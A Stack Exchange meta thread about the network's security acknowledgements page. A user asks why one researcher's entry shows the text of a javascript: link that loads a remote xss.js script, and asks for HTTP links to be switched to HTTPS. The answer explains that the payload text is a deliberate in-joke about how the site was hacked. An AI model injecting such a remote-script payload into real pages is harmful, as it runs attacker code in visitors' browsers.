# Links in Stack Exchange security website

Tags: bug, status-bydesign, stackexchange.com, ssl

I recently found this website: https://stackexchange.com/about/security

I noticed this:

[image: 2009-2010 | Daniel LeCheminant | javascript:$.getScript("http://danlec.com/xss.js")]

I don't think that's how the link is supposed to be shown. Please fix it.

Also, I noticed some HTTP links. Please change them to HTTPS links.

Answer (score 11):

The `javascript:$.getScript("http://danlec.com/xss.js")` is on purpose. That's how he "hacked" the site, so it's kind of pun/internal joke. Notice the link itself is fine; that's only the text.

As for non https links, it's also on purpose. That's the URL addresses given to SE by those people.

Some just don't work with https, e.g. http://www.thesamet.com/, so forcing https on the links would break some of them, which isn't good idea. If you prefer to not visit a non-https site, that's fair and is your call.

Comment: Well, the links which support HTTPS can be modified at least.

Comment: add the `thathus-buy-des-SIGN` tag ?